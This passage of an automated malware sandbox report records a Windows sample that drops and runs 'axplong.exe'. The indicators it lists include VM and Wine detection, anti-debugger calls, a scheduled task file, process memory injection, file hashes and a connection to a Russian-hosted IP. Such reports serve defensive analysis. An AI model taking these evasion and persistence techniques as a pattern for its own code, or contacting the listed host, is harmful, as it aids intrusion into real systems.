| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3112 wrote to memory of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe |
| PID 3112 wrote to memory of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe |
| PID 3112 wrote to memory of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe
"C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
Files
memory/3112-0-0x0000000000920000-0x0000000000DC6000-memory.dmp
memory/3112-1-0x00000000772E6000-0x00000000772E8000-memory.dmp
memory/3112-2-0x0000000000921000-0x000000000094F000-memory.dmp
memory/3112-3-0x0000000000920000-0x0000000000DC6000-memory.dmp
memory/3112-4-0x0000000000920000-0x0000000000DC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
| MD5 | 59953a2ace8d80a3eac87bb37cf35871 |
| SHA1 | f22821242ad268998f04a52f46ce23bf1d0bddd3 |
| SHA256 | 4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456 |
| SHA512 | 87e266458db8c1c39d4f4473b7933c30f60964f2246727c48f44b4bcfa83e3207bc660f887148316c0a09681b9795276fe25acea94b5324e1760d5a1472969f8 |
memory/3112-17-0x0000000000920000-0x0000000000DC6000-memory.dmp
memory/1608-18-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-20-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-19-0x0000000000D81000-0x0000000000DAF000-memory.dmp
memory/1608-21-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-22-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-23-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-24-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-25-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-26-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-27-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-29-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-30-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-31-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2160-33-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-34-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-35-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-36-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-37-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-38-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-39-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/2404-41-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-42-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-43-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-44-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-45-0x0000000000D80000-0x0000000001226000-memory.dmp
memory/1608-46-0x0000000000D80000-0x0000000001226000-memory.dmp